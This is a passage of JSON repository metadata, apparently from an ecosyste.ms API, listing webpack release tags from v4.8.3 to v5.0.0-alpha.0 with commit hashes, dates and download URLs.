nd":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","d